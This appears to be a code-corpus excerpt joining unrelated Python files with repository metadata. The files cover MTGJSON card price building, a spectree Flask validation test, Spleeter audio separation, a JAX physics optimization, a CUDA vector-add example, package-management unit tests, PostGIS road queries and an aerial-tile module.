self.planeswalker = ScryfallProvider().get_catalog_entry(
"planeswalker-types"
)
self.scheme = []
self.sorcery = self.instant
self.tribal = []
self.vanguard = []
def to_json(self) -> Dict[str, Any]:
"""
Support json.dump()
:return: JSON serialized object
"""
return {
to_camel_case(key): value
for key, value in self.__dict__.items()
if "__" not in key and not callable(value)
}
types: Dict[str, Dict[str, List[str]]]
def __init__(self) -> None:
"""
Initializer to build up the object
"""
self.types = {}
comp_rules = parse_magic_rules_subset(WizardsProvider().get_magic_rules())
inner_sets = self.MtgjsonCardTypesInnerObject(comp_rules)
super_regex = re.compile(r".*The supertypes are (.*)\.")
super_types = regex_str_to_list(super_regex.search(comp_rules))
for key, value in inner_sets.to_json().items():
self.types[key] = {"subTypes": value, "superTypes": super_types}
def to_json(self) -> Dict[str, Any]:
"""
Support json.dump()
:return: JSON serialized object
"""
return {
to_camel_case(key): value
for key, value in self.types.items()
if "__" not in key and not callable(value)
}
def regex_str_to_list(regex_match: Optional[Match]) -> List[str]:
"""
Take a regex match object and turn a string in
format "a, b, c, ..., and z." into [a,b,c,...,z]
:param regex_match: Regex match object
:return: List of strings
"""
if not regex_match:
return []
# Get only the sentence with the types
card_types = regex_match.group(1).split(". ")[0]
# Split the types by comma
card_types_split: List[str] = card_types.split(", ")
# If there are only two elements, split by " and " instead
if len(card_types_split) == 1:
card_types_split = card_types.split(" and ")
else:
# Replace the last one from "and XYZ" to just "XYZ"
card_types_split[-1] = card_types_split[-1].split(" ", 1)[1]
for index, value in enumerate(card_types_split):
card_types_split[index] = string.capwords(value.split(" (")[0])
return card_types_split
```
#### File: mtgjson/mtgjson5/price_builder.py
```python
import configparser
import datetime
import json
import logging
import lzma
import pathlib
import shutil
from typing import Any, Dict
import dateutil.relativedelta
import git
import requests
from .consts import CACHE_PATH, OUTPUT_PATH
from .providers import (
CardHoarderProvider,
CardKingdomProvider,
CardMarketProvider,
TCGPlayerProvider,
)
from .utils import deep_merge_dictionaries
LOGGER = logging.getLogger(__name__)
def download_prices_archive(
gist_repo_name: str, file_name: str, github_repo_local_path: pathlib.Path
) -> Dict[str, Dict[str, float]]:
"""
Grab the contents from a gist file
:param gist_repo_name: Gist repo name
:param file_name: File to open from Gist
:param github_repo_local_path: Where to checkout the repo to
:return: File content
"""
github_url = f"https://gist.github.com/{gist_repo_name}"
if github_repo_local_path.is_dir():
LOGGER.info("Deleting Old Price Data Repo")
shutil.rmtree(github_repo_local_path)
LOGGER.info("Cloning Price Data Repo")
git_sh = git.cmd.Git()
git_sh.clone(github_url, github_repo_local_path, depth=1)
with lzma.open(github_repo_local_path.joinpath(file_name)) as file:
return dict(json.load(file))
def upload_prices_archive(
config: configparser.ConfigParser,
github_repo_local_path: pathlib.Path,
content: Any,
) -> None:
"""
Upload prices archive back to GitHub
:param config Config for GitHub
:param github_repo_local_path: Local file system file
:param content: File content
"""
if "GitHub" not in config.sections():
LOGGER.warning("GitHub section not established. Skipping upload")
return
# Config values for GitHub
github_username = config.get("GitHub", "username")
github_api_token = config.get("GitHub", "api_key")
github_file_name = config.get("GitHub", "file_name")
github_repo_name = config.get("GitHub", "repo_name")
if not (
github_username and github_api_token and github_file_name and github_repo_name
):
LOGGER.warning("GitHub key values missing. Skipping upload")
return
# Compress the file to upload for speed and storage savings
with lzma.open(github_repo_local_path.joinpath(github_file_name), "w") as file:
file.write(json.dumps(content).encode("utf-8"))
try:
repo = git.Repo(github_repo_local_path)
# Update remote to allow pushing
repo.git.remote(
"set-url",
"origin",
f"https://{github_username}:{github_api_token}@gist.github.com/{github_repo_name}.git",
)
repo.git.commit("-am", "auto-push")
origin = repo.remote()
origin.push()
LOGGER.info("Pushed changes to GitHub repo")
except git.GitCommandError:
LOGGER.warning("No changes found to GitHub repo, skipping")
shutil.rmtree(github_repo_local_path)
def prune_prices_archive(content: Dict[str, Any], months: int = 3) -> None:
"""
Prune entries from the MTGJSON database that are older than `months` old
:param content: Dataset to modify
:param months: How many months back should we keep (default = 3)
"""
prune_date_str = (
datetime.date.today() + dateutil.relativedelta.relativedelta(months=-months)
).strftime("%Y-%m-%d")
keys_pruned = 0
def prune_recursive(obj: Dict[str, Any], depth: int = 0) -> None:
"""
Recursive pruner to pluck out bad dates and empty fields
"""
nonlocal keys_pruned
if depth == 5:
for date in list(obj.keys()):
if date < prune_date_str:
del obj[date]
keys_pruned += 1
elif isinstance(obj, dict):
for key, value in list(obj.items()):
prune_recursive(value, depth + 1)
if not value:
del obj[key]
keys_pruned += 1
LOGGER.info("Determining keys to prune")
prune_recursive(content)
LOGGER.info(f"Pruned {keys_pruned} structs")
def build_today_prices() -> Dict[str, Any]:
"""
Get today's prices from upstream sources and combine them together
:return: Today's prices (to be merged into archive)
"""
if not OUTPUT_PATH.joinpath("AllPrintings.json").is_file():
LOGGER.error(f"Unable to build prices. AllPrintings not found in {OUTPUT_PATH}")
return {}
card_hoarder = _generate_prices(CardHoarderProvider())
tcgplayer = _generate_prices(TCGPlayerProvider())
card_market = _generate_prices(CardMarketProvider())
card_kingdom = _generate_prices(CardKingdomProvider())
final_results = deep_merge_dictionaries(
card_hoarder, tcgplayer, card_market, card_kingdom
)
return final_results
def _generate_prices(provider: Any) -> Dict[str, Any]:
"""
Generate the prices for a source and prepare them for
merging with other entities
:param provider: MTGJSON Provider that implements generate_today_price_dict
:return Manageable data for MTGJSON prices
"""
preprocess_prices = provider.generate_today_price_dict(
OUTPUT_PATH.joinpath("AllPrintings.json")
)
final_prices: Dict[str, Any] = json.loads(
json.dumps(preprocess_prices, default=lambda o: o.to_json())
)
return final_prices
def get_price_archive_data() -> Dict[str, Dict[str, float]]:
"""
Download compiled MTGJSON price data
:return: MTGJSON price data
"""
config = TCGPlayerProvider().get_configs()
if "GitHub" not in config.sections():
LOGGER.warning("GitHub section not established. Skipping requests")
return {}
# Config values for GitHub
github_repo_name = config.get("GitHub", "repo_name")
github_file_name = config.get("GitHub", "file_name")
github_local_path = CACHE_PATH.joinpath("GitHub-PricesArchive")
if not (github_repo_name and github_file_name and github_local_path):
LOGGER.warning("GitHub key values missing. Skipping requests")
return {}
# Get the current working database
LOGGER.info("Downloading Price Data Repo")
return download_prices_archive(
github_repo_name, github_file_name, github_local_path
)
def download_old_all_printings() -> None:
"""
Download the hosted version of AllPrintings from MTGJSON
for future consumption
"""
file_bytes = b""
file_data = requests.get(
"https://mtgjson.com/api/v5/AllPrintings.json.xz", stream=True
)
for chunk in file_data.iter_content(chunk_size=1024 * 36):
if chunk:
file_bytes += chunk
OUTPUT_PATH.mkdir(parents=True, exist_ok=True)
with OUTPUT_PATH.joinpath("AllPrintings.json").open("w", encoding="utf8") as f:
f.write(lzma.decompress(file_bytes).decode())
def build_prices() -> Dict[str, Any]:
"""
The full build prices operation
Prune & Update remote database
:return Latest prices
"""
LOGGER.info("Prices Build - Building Prices")
# We'll need AllPrintings.json to handle this
if not OUTPUT_PATH.joinpath("AllPrintings.json").is_file():
LOGGER.info("AllPrintings not found, attempting to download")
download_old_all_printings()
# Get today's price database
LOGGER.info("Building new price data")
today_prices = build_today_prices()
if not today_prices:
LOGGER.warning("Pricing information failed to generate")
return {}
archive_prices = get_price_archive_data()
# Update local copy of database
LOGGER.info("Merging price data")
archive_prices = deep_merge_dictionaries(archive_prices, today_prices)
# Prune local copy of database
LOGGER.info("Pruning price data")
prune_prices_archive(archive_prices)
# Push changes to remote database
LOGGER.info("Uploading price data")
config = TCGPlayerProvider().get_configs()
github_local_path = CACHE_PATH.joinpath("GitHub-PricesArchive")
upload_prices_archive(config, github_local_path, archive_prices)
# Return the latest prices
CACHE_PATH.joinpath("last_price_build_time").touch()
return archive_prices
def should_build_new_prices() -> bool:
"""
Determine if prices were built recently enough that there
is no reason to build them again
:return: Should prices be rebuilt
"""
cache_file = CACHE_PATH.joinpath("last_price_build_time")
if not cache_file.is_file():
return True
stat_time = cache_file.stat().st_mtime
last_price_build_time = datetime.datetime.fromtimestamp(stat_time)
twelve_hours_ago = datetime.datetime.now() - datetime.timedelta(hours=12)
return twelve_hours_ago > last_price_build_time
```
#### File: mtgjson5/providers/abstract.py
```python
import abc
import configparser
import datetime
import logging
from typing import Any, Dict, Union
import requests_cache
from ..consts import CACHE_PATH, CONFIG, USE_CACHE
LOGGER = logging.getLogger(__name__)
class AbstractProvider(abc.ABC):
"""
Abstract class to indicate what other providers should provide
"""
class_id: str
session_header: Dict[str, str]
today_date: str = datetime.datetime.today().strftime("%Y-%m-%d")
def __init__(self, headers: Dict[str, str]):
super().__init__()
self.class_id = ""
self.session_header = headers
self.__install_cache()
# Abstract Methods
@abc.abstractmethod
def _build_http_header(self) -> Dict[str, str]:
"""
Construct the HTTP authorization header
:return: Authorization header
"""
@abc.abstractmethod
def download(self, url: str, params: Dict[str, Union[str, int]] = None) -> Any:
"""
Download an object from a service using appropriate authentication protocols
:param url: URL to download content from
:param params: Options to give to the GET request
"""
# Class Methods
@classmethod
def get_class_name(cls) -> str:
"""
Get the name of the calling class
:return: Calling class name
"""
return cls.__name__
@classmethod
def get_class_id(cls) -> str:
"""
Grab the class ID for hashing purposes
:return Class ID
"""
return cls.class_id
@staticmethod
def get_configs() -> configparser.ConfigParser:
"""
Parse the config for this specific setup
:return: Parsed config file
"""
return CONFIG
@staticmethod
def log_download(response: Any) -> None:
"""
Log how the URL was acquired
:param response: Response from Server
"""
LOGGER.debug(
f"Downloaded {response.url} (Cache = {response.from_cache if USE_CACHE else False})"
)
# Private Methods
def __install_cache(self) -> None:
"""
Initiate the MTGJSON cache for requests
(Useful for development and re-running often)
"""
if USE_CACHE:
CACHE_PATH.mkdir(exist_ok=True)
requests_cache.install_cache(
str(CACHE_PATH.joinpath(self.get_class_name()))
)
```
#### File: mtgjson5/providers/cardhoarder.py
```python
import logging
import pathlib
from typing import Any, Dict, List, Union
from singleton_decorator import singleton
from ..classes import MtgjsonPricesObject
from ..providers.abstract import AbstractProvider
from ..utils import get_all_cards_and_tokens, retryable_session
LOGGER = logging.getLogger(__name__)
@singleton
class CardHoarderProvider(AbstractProvider):
"""
CardHoarder container
"""
ch_api_url: str = "https://www.cardhoarder.com/affiliates/pricefile/{}"
def __init__(self) -> None:
"""
Initializer
"""
super().__init__(self._build_http_header())
def _build_http_header(self) -> Dict[str, str]:
"""
Construct the Authorization header for CardHoarder
:return: Authorization header
"""
headers: Dict[str, str] = {}
__keys_found: bool
config = self.get_configs()
if "CardHoarder" not in config.sections():
LOGGER.warning("CardHoarder section not established. Skipping upload")
self.__keys_found = False
self.ch_api_url = ""
return headers
if config.get("CardHoarder", "token"):
self.__keys_found = True
self.ch_api_url = self.ch_api_url.format(config.get("CardHoarder", "token"))
else:
LOGGER.info("CardHoarder keys values missing. Skipping pricing")
self.__keys_found = False
self.ch_api_url = ""
return headers
def download(self, url: str, params: Dict[str, Union[str, int]] = None) -> Any:
"""
Download content from Scryfall
Api calls always return JSON from Scryfall
:param url: URL to download from
:param params: Options for URL download
"""
session = retryable_session()
session.headers.update(self.session_header)
response = session.get(url)
self.log_download(response)
return response.content.decode()
def convert_cardhoarder_to_mtgjson(
self, url_to_parse: str, mtgo_to_mtgjson_map: Dict[str, str]
) -> Dict[str, float]:
"""
Download CardHoarder cards and convert them into a more
consumable format for further processing.
:param url_to_parse: URL to download CardHoarder cards from
:param mtgo_to_mtgjson_map: Mapping for translating incoming data
:return: Consumable dictionary
"""
mtgjson_price_map = {}
request_api_response: str = self.download(url_to_parse)
# All Entries from CH, cutting off headers
file_rows: List[str] = request_api_response.splitlines()[2:]
for file_row in file_rows:
card_row = file_row.split("\t")
mtgo_id = card_row[0]
card_uuid = mtgo_to_mtgjson_map.get(mtgo_id)
if not card_uuid:
LOGGER.debug(f"CardHoarder {card_row} unable to be mapped, skipping")
continue
if len(card_row) <= 6:
LOGGER.warning(f"CardHoarder entry {card_row} malformed, skipping")
continue
mtgjson_price_map[card_uuid] = float(card_row[5])
return mtgjson_price_map
def generate_today_price_dict(
self, all_printings_path: Any
) -> Dict[str, MtgjsonPricesObject]:
"""
Generate a single-day price structure for MTGO from CardHoarder
:return MTGJSON prices single day structure
"""
if not self.__keys_found:
return {}
mtgo_to_mtgjson_map = self.get_mtgo_to_mtgjson_map(all_printings_path)
normal_cards = self.convert_cardhoarder_to_mtgjson(
self.ch_api_url, mtgo_to_mtgjson_map
)
foil_cards = self.convert_cardhoarder_to_mtgjson(
self.ch_api_url + "/foil", mtgo_to_mtgjson_map
)
db_contents: Dict[str, MtgjsonPricesObject] = {}
self._construct_for_cards(db_contents, normal_cards, True)
self._construct_for_cards(db_contents, foil_cards)
return db_contents
def _construct_for_cards(
self,
semi_completed_data: Dict[str, MtgjsonPricesObject],
cards: Dict[str, float],
is_mtgo_normal: bool = False,
) -> None:
"""
Construct MTGJSON price output for a single day given a card set
:param semi_completed_data: MTGJSON set to update
:param cards: Cards to iterate
"""
for key, value in cards.items():
if key not in semi_completed_data.keys():
semi_completed_data[key] = MtgjsonPricesObject(
"mtgo", "cardhoarder", self.today_date, "USD"
)
if is_mtgo_normal:
semi_completed_data[key].sell_normal = float(value)
else:
semi_completed_data[key].sell_foil = float(value)
@staticmethod
def get_mtgo_to_mtgjson_map(all_printings_path: pathlib.Path) -> Dict[str, str]:
"""
Construct a mapping from MTGO IDs (Regular & Foil) to MTGJSON UUIDs
:param all_printings_path: AllPrintings to generate mapping from
:return MTGO to MTGJSON mapping
"""
mtgo_to_mtgjson = dict()
for card in get_all_cards_and_tokens(all_printings_path):
identifiers = card["identifiers"]
if "mtgoId" in identifiers:
mtgo_to_mtgjson[identifiers["mtgoId"]] = card["uuid"]
if "mtgoFoilId" in identifiers:
mtgo_to_mtgjson[identifiers["mtgoFoilId"]] = card["uuid"]
return mtgo_to_mtgjson
```
#### File: mtgjson5/providers/mtgban.py
```python
import logging
from typing import Any, Dict, Union
from singleton_decorator import singleton
from ..providers.abstract import AbstractProvider
from ..utils import retryable_session
LOGGER = logging.getLogger(__name__)
@singleton
class MTGBanProvider(AbstractProvider):
"""
MTGBan container
"""
api_url: str = "https://www.mtgban.com/api/mtgjson/ck.json?sig={}"
__mtgjson_to_card_kingdom: Dict[str, Dict[str, Dict[str, str]]]
def __init__(self) -> None:
"""
Initializer
"""
super().__init__(self._build_http_header())
self.__mtgjson_to_card_kingdom = {}
def _build_http_header(self) -> Dict[str, str]:
"""
Construct the Authorization header for MTGBan
:return: Authorization header
"""
headers: Dict[str, str] = {}
__keys_found: bool
config = self.get_configs()
if "MTGBan" not in config.sections():
LOGGER.warning("MTGBan section not established. Skipping alerts")
self.__keys_found = False
self.api_url = ""
return headers
if config.get("MTGBan", "api_key"):
self.__keys_found = True
self.api_url = self.api_url.format(config.get("MTGBan", "api_key"))
else:
LOGGER.info("MTGBan keys values missing. Skipping imports")
self.__keys_found = False
self.api_url = ""
return headers
def download(self, url: str, params: Dict[str, Union[str, int]] = None) -> Any:
"""
Download a URL
:param url: URL to download from
:param params: Options for URL download
"""
session = retryable_session()
session.headers.update(self.session_header)
response = session.get(url)
self.log_download(response)
return response.json()
def get_mtgjson_to_card_kingdom(self) -> Dict[str, Dict[str, Dict[str, str]]]:
"""
Get MTGJSON to Card Kingdom translation table
:return Compiled table for future use
"""
if not self.__keys_found:
return {}
if not self.__mtgjson_to_card_kingdom:
self.__mtgjson_to_card_kingdom = self.download(self.api_url)
return self.__mtgjson_to_card_kingdom
``` |
{
"source": "0b01001001/spectree",
"score": 2
} |
#### File: spectree/tests/test_plugin_flask_view.py
```python
import json
from random import randint
import pytest
from flask import Flask, jsonify, request
from flask.views import MethodView
from spectree import Response, SpecTree
from .common import JSON, Cookies, Headers, Query, Resp, StrDict, api_tag
def before_handler(req, resp, err, _):
if err:
resp.headers["X-Error"] = "Validation Error"
def after_handler(req, resp, err, _):
resp.headers["X-Validation"] = "Pass"
def api_after_handler(req, resp, err, _):
resp.headers["X-API"] = "OK"
api = SpecTree("flask", before=before_handler, after=after_handler, annotations=True)
app = Flask(__name__)
app.config["TESTING"] = True
class Ping(MethodView):
@api.validate(
headers=Headers, resp=Response(HTTP_200=StrDict), tags=["test", "health"]
)
def get(self):
"""summary
description"""
return jsonify(msg="pong")
class User(MethodView):
@api.validate(
query=Query,
json=JSON,
cookies=Cookies,
resp=Response(HTTP_200=Resp, HTTP_401=None),
tags=[api_tag, "test"],
after=api_after_handler,
)
def post(self, name):
score = [randint(0, request.context.json.limit) for _ in range(5)]
score.sort(reverse=request.context.query.order)
assert request.context.cookies.pub == "abcdefg"
assert request.cookies["pub"] == "abcdefg"
return jsonify(name=request.context.json.name, score=score)
class UserAnnotated(MethodView):
@api.validate(
resp=Response(HTTP_200=Resp, HTTP_401=None),
tags=[api_tag, "test"],
after=api_after_handler,
)
def post(self, name, query: Query, json: JSON, cookies: Cookies):
score = [randint(0, json.limit) for _ in range(5)]
score.sort(reverse=query.order)
assert cookies.pub == "abcdefg"
assert request.cookies["pub"] == "abcdefg"
return jsonify(name=json.name, score=score)
app.add_url_rule("/ping", view_func=Ping.as_view("ping"))
app.add_url_rule("/api/user/<name>", view_func=User.as_view("user"), methods=["POST"])
app.add_url_rule(
"/api/user_annotated/<name>",
view_func=UserAnnotated.as_view("user_annotated"),
methods=["POST"],
)
# INFO: ensures that spec is calculated and cached _after_ registering
# view functions for validations. This enables tests to access `api.spec`
# without app_context.
with app.app_context():
api.spec
api.register(app)
@pytest.fixture
def client():
with app.test_client() as client:
yield client
def test_flask_validate(client):
resp = client.get("/ping")
assert resp.status_code == 422
assert resp.headers.get("X-Error") == "Validation Error"
resp = client.get("/ping", headers={"lang": "en-US"})
assert resp.json == {"msg": "pong"}
assert resp.headers.get("X-Error") is None
assert resp.headers.get("X-Validation") == "Pass"
resp = client.post("api/user/flask")
assert resp.status_code == 422
assert resp.headers.get("X-Error") == "Validation Error"
client.set_cookie("flask", "pub", "abcdefg")
for fragment in ("user", "user_annotated"):
resp = client.post(
f"/api/{fragment}/flask?order=1",
data=json.dumps(dict(name="flask", limit=10)),
content_type="application/json",
)
assert resp.status_code == 200, resp.json
assert resp.headers.get("X-Validation") is None
assert resp.headers.get("X-API") == "OK"
assert resp.json["name"] == "flask"
assert resp.json["score"] == sorted(resp.json["score"], reverse=True)
resp = client.post(
f"/api/{fragment}/flask?order=0",
data=json.dumps(dict(name="flask", limit=10)),
content_type="application/json",
)
assert resp.json["score"] == sorted(resp.json["score"], reverse=False)
resp = client.post(
f"/api/{fragment}/flask?order=0",
data="name=flask&limit=10",
content_type="application/x-www-form-urlencoded",
)
assert resp.json["score"] == sorted(resp.json["score"], reverse=False)
def test_flask_doc(client):
resp = client.get("/apidoc/openapi.json")
assert resp.json == api.spec
resp = client.get("/apidoc/redoc")
assert resp.status_code == 200
resp = client.get("/apidoc/swagger")
assert resp.status_code == 200
``` |
{
"source": "0b01/autobasstab-web",
"score": 3
} |
#### File: autobasstab-web/api/separate.py
```python
import os
import ffmpeg
import numpy as np
# from spleeter import *
# from spleeter.audio.adapter import get_default_audio_adapter
# from spleeter.separator import Separator
# from spleeter.utils import *
from django.conf import settings
from .models import ProcessedTrack
class SpleeterSeparator:
"""Performs source separation using Spleeter API."""
def __init__(self, config=None):
"""Default constructor.
:param config: Separator config, defaults to None
"""
if config is None:
self.audio_bitrate = '256k'
self.audio_format = 'wav'
self.sample_rate = 44100
self.spleeter_stem = 'config/4stems-16kHz.json'
else:
self.audio_bitrate = config['audio_bitrate']
self.audio_format = config['audio_format']
self.sample_rate = config['sample_rate']
self.spleeter_stem = config['spleeter_stem']
# Use librosa backend as it is less memory intensive
self.separator = Separator(self.spleeter_stem, stft_backend='librosa', multiprocess=False)
self.audio_adapter = get_default_audio_adapter()
def separate(self, parts, input_path, dir_name, file_name):
"""Performs source separation by adding together the parts to be kept.
:param parts: List of parts to keep ('vocals', 'drums', 'bass', 'other')
:param input_path: Path to source file
:param output_path: Path to output file
:raises e: FFMPEG error
"""
waveform, _ = self.audio_adapter.load(input_path, sample_rate=self.sample_rate)
prediction = self.separator.separate(waveform)
out = np.zeros_like(prediction['vocals'])
part_count = 0
ret = {}
# Add up parts that were requested
for key in prediction:
dir = os.path.join(dir_name, key+".mp3")
self.audio_adapter.save(os.path.join(settings.MEDIA_ROOT, dir), prediction[key], self.separator._sample_rate, self.audio_format, self.audio_bitrate)
ret[key] = dir
if parts[key]:
out += prediction[key]
part_count += 1
out /= part_count
req_path = os.path.join(dir_name, file_name)
self.audio_adapter.save(os.path.join(settings.MEDIA_ROOT, req_path), out, self.separator._sample_rate, self.audio_format, self.audio_bitrate)
ret["req"] = req_path
return ret
def cached(self, parts, source_track, dir_name, file_name):
bass_path = ProcessedTrack.objects.filter(source_track=source_track, bass=True, vocals=False, other=False, drums=False).first().file.name
vocals_path = ProcessedTrack.objects.filter(source_track=source_track, bass=False, vocals=True, other=False, drums=False).first().file.name
other_path = ProcessedTrack.objects.filter(source_track=source_track, bass=False, vocals=False, other=True, drums=False).first().file.name
drums_path = ProcessedTrack.objects.filter(source_track=source_track, bass=False, vocals=False, other=False, drums=True).first().file.name
ret = {
"bass": bass_path,
"vocals": vocals_path,
"other": other_path,
"drums": drums_path,
}
load_paths = {k:ret[k] for k in parts if parts[k]}
arrs = [self.audio_adapter.load(os.path.join(settings.MEDIA_ROOT, p))[0] \
for p in load_paths.values()]
out = sum(arrs) / len(arrs)
req_path = os.path.join(dir_name, file_name)
self.audio_adapter.save(os.path.join(settings.MEDIA_ROOT, req_path), out, self.separator._sample_rate, self.audio_format, self.audio_bitrate)
ret["req"] = req_path
return ret
``` |
{
"source": "0b01/jax",
"score": 3
} |
#### File: jax/examples/physical_optimization.py
```python
import numpy as onp
import matplotlib.pyplot as plt
import jax.numpy as np
from tqdm import tqdm
from jax import grad, jit, vmap, device_put
from random import uniform
N = 25
H_step = 0.1
H_0 = 10
g = -9.8
hoop_x, hoop_y = (10, 8)
board = device_put(onp.random.rand(N))
# print(board)
@jit
def build_surface(board):
ret = []
for i, (a,b) in enumerate(zip(board, board[1:])):
y_0 = -i*H_step+H_0
x_0 = a + 10
y_1 = -(i+1)*H_step+H_0
x_1 = b + 10
slope = (y_1 - y_0) / (x_1 - x_0)
intercept = y_1 - x_1 * slope
ret.append([slope, intercept])
return ret
@jit
def solve_t(k, l, x_0, y_0, v_x0, v_y0):
c = y_0 - k * x_0 - l
b = v_y0 - k * v_x0
a = 0.5 * g
d = (b**2) - (4*a*c)
sol1 = (-b - np.sqrt(d))/(2*a)
sol2 = (-b + np.sqrt(d))/(2*a)
# print(sol1, sol2)
y_1 = y_0 + v_y0*sol1 + 0.5*g*sol1 ** 2
y_2 = y_0 + v_y0*sol2 + 0.5*g*sol2 ** 2
return sol1, sol2, y_1, y_2
@jit
def dist_from_hoop(t, y_f, x_0, v_x0, v_y0):
x_f = x_0 + v_x0 * t
v_xf = v_x0
v_yf = v_y0 + g * t
cor = 0.81 # https://en.wikipedia.org/wiki/Coefficient_of_restitution
v_xb = -cor * v_xf
v_yb = -cor * v_yf
t = 0.1
x_b = x_f + v_xb * t
y_b = y_f + v_yb * t + 0.5*g*t**2
# print("final_pos", x_b, y_b)
dist = np.sqrt((x_b - hoop_x)**2 + (y_b - hoop_y)**2)
return dist
def bounce(board, x_0, y_0, v_x0, v_y0):
lines = build_surface(board)
# y_0 + v_y0*t + 0.5*g*t^2 = k(x_0 + v_x0*t) + l
# (y_0 - k * x_0 - l) + (v_y0 - k * v_x0)*t + 0.5*g*t^2 = 0
for i, (k, l) in enumerate(lines):
sol1, sol2, y_1, y_2 = solve_t(k, l, x_0, y_0, v_x0, v_y0)
t = 0
y_f = 0
if sol1 > 0 and -(i+1)*H_step+H_0 < y_1 < -i*H_step+H_0:
t = sol1
y_f = y_1
elif sol2 > 0 and -(i+1)*H_step+H_0 < y_2 < -i*H_step+H_0:
t = sol2
y_f = y_2
else:
continue
loss = dist_from_hoop(t, y_f, x_0, v_x0, v_y0)
return loss
return 0.
# print(bounce(board, 3.1, 4, 10, 10))
def plot():
plt.figure(figsize=(12,6))
# xs = np.arange(8, 12, 0.1);
# for m, k in build_surface(board):
# ys = xs * m + k
# plt.plot(xs, ys)
for i, x in enumerate(board):
y = -i*H_step+H_0
print(x+10, y)
plt.scatter(x+10, y)
plt.xlim(0, 12)
plt.ylim(0, 12)
plt.scatter(hoop_x, hoop_y, s=300)
plt.xlabel('x')
plt.ylabel('y')
# plt.show()
plot()
plt.savefig("orig.png")
for i in tqdm(range(3000)):
x0 = 0
y0 = 5
vx = uniform(7, 10)
vy = uniform(7, 10)
board_grad = grad(bounce, 0)(board, x0, y0, vx, vy)
# print(board_grad)
board += -board_grad * 0.1
plot()
plt.savefig("optimized.png")
``` |
{
"source": "0b10010010/CUDAKalmanFilter",
"score": 3
} |
#### File: CUDAKalmanFilter/test/gpu_example.py
```python
import numpy as np
from timeit import default_timer as timer
from numba import vectorize
@vectorize(["float32(float32, float32)"], target='cuda')
def VectorAdd_GPU(a, b):
return a + b
def VectorAdd_CPU(a, b, c):
for i in range(a.size):
c[i] = a[i] + b[i]
def main():
N = 3200000
A = np.ones(N, dtype=np.float32)
B = np.ones(N, dtype=np.float32)
C = np.zeros(N, dtype=np.float32)
start = timer()
VectorAdd_CPU(A, B, C)
vectoradd_cpu_time = timer() - start
start = timer()
C = VectorAdd_GPU(A, B)
vectoradd_gpu_time = timer() - start
print("VectorAdd_CPU took %f seconds" % vectoradd_cpu_time)
print("VectorAdd_GPU took %f seconds" % vectoradd_gpu_time)
if __name__ == '__main__':
main()
``` |
{
"source": "0b10/qsm",
"score": 2
} |
#### File: qsm/tests/test_remote.py
```python
from qsm.remote import update, install, remove
import re
# >>> UPDATE >>>
def test_update_returns_a_string():
assert isinstance(update(), str), "did not return a string"
def test_update_returns_an_expected_value():
assert re.search("dnf update -y", update()
), "did not return an update script"
# >>> INSTALL >>>
def test_install_returns_a_string():
assert isinstance(install("vim nano"), str), "did not return a string"
def test_install_returns_an_expected_value():
assert re.search("dnf install -y vim", install("vim")
), "did not return an install script"
# >>> REMOVE >>>
def test_remove_returns_a_string():
assert isinstance(remove("vim nano"), str), "did not return a string"
def test_remove_returns_an_expected_value():
assert re.search("dnf remove -y vim nano", remove("vim nano")
), "did not return an install script"
``` |
{
"source": "0b3d/dkmkpy",
"score": 3
} |
#### File: renderer/pyfiles/extract_road_points_gis.py
```python
import psycopg2, pickle
#Define function to query info, return a tuple
def query_attributes(locations):
size = 0.0005
line_list = []
point_list = []
polygon_list = []
for location in locations:
lat, lon = location[0], location[1]
# , leisure, tourism, railway, water, tags
query1 = """ SELECT name, highway
FROM planet_osm_line
WHERE planet_osm_line.way &&
ST_Transform(
ST_MakeEnvelope({}, {}, {}, {},
4326),3857
) and name <> '<NAME>' and highway <> '';
"""
query1 = query1.format(lon-size,lat-size,lon+size,lat+size)
cur.execute(query1)
res = cur.fetchall()
line_list.append(res)
# Query data from points
query2 = """ SELECT amenity, building, religion, shop, tourism, tags
FROM planet_osm_point
WHERE planet_osm_point.way &&
ST_Transform(
ST_MakeEnvelope({}, {}, {}, {},
4326),3857
);
"""
query2 = query2.format(lon-size,lat-size,lon+size,lat+size)
cur.execute(query1)
res = cur.fetchall()
point_list.append(res)
# Query data from polygons
query3 = """ SELECT amenity, landuse, shop, building, sport, tags
FROM planet_osm_polygon
WHERE planet_osm_polygon.way &&
ST_Transform(
ST_MakeEnvelope({}, {}, {}, {},
4326),3857
);
"""
query3 = query3.format(lon-size,lat-size,lon+size,lat+size)
cur.execute(query2)
res = cur.fetchall()
polygon_list.append(res)
return line_list, point_list, polygon_list
# Query the main information
conn = psycopg2.connect("dbname='gis' user='postgres' host='f978bc0bd1f8'")
cur = conn.cursor()
query = """
SELECT ST_Y((dp).geom), ST_X((dp).geom), name, highway, junction, sidewalk, lit, lanes, noexit
FROM(
SELECT ST_DumpPoints(ST_Transform(way,4326)) AS dp, name, highway, junction, tags->'sidewalk' as sidewalk, tags->'lit' as lit, tags->'lanes' as lanes, tags->'noexit' as noexit
FROM planet_osm_line
WHERE name = '<NAME>' and highway <> ''
ORDER BY name
) As foo;
"""
cur.execute(query)
locations = cur.fetchall()
line, point, polygon = query_attributes(locations)
for location in locations:
print(location[0:2])
for entry in line:
print(entry)
# #Now query noexit points
# #query = """ SELECT ST_X(ST_Transform(way,4326)), ST_Y(ST_Transform(way,4326)) -- tags
# #FROM planet_osm_point
# #WHERE tags @> 'noexit=>yes'::hstore;
# #"""
# #cur.execute(query)
# #noexit = cur.fetchall()
# #for entry in noexit:
# # print(entry)
# query_limits = """
# select min(st_xmin(st_transform(way,4326))), min(st_ymin(st_transform(way,4326))), max(st_xmax(st_transform(way,4326))), max(st_ymax(st_transform(way,4326))) from planet_osm_line where name<>'' and highway<>'';
# """
# cur.execute(query_limits)
# extreme = cur.fetchall()
# print("Minimun , Maximum :")
# print(extreme)
# #-------Save in a Pickel File -----------------------------
# #file_path = "/map_data/locations_data.pkl"
# #with open( file_path, 'wb') as f:
# # pickle.dump(locations, f)
``` |
{
"source": "0b3d/Image-Map-Embeddings",
"score": 3
} |
#### File: Image-Map-Embeddings/aerial/area.py
```python
import os
import cv2
import numpy as np
from aerial.tile import Tile, deg2num, num2deg
from utils.util import haversine
def get_area_extents():
areas = {
'London_test' : [51.4601825, -0.1282832, 51.5477509, -0.0544434],
'SP50NW': [51.7414809, -1.2772553, 51.7859644, -1.2040581],
'ST57SE2014' : [51.4272088, -2.6486388, 51.4725403, -2.5772934 ],
'ST57SE2016' : [51.4272088, -2.6486388, 51.4725403, -2.5772934 ],
'ST57SE2017' : [51.4272088, -2.6486388, 51.4725403, -2.5772934 ]
}
return areas
def get_aerial_directory(areaname):
directories = {
'London_test' : 'aerial_tiles',
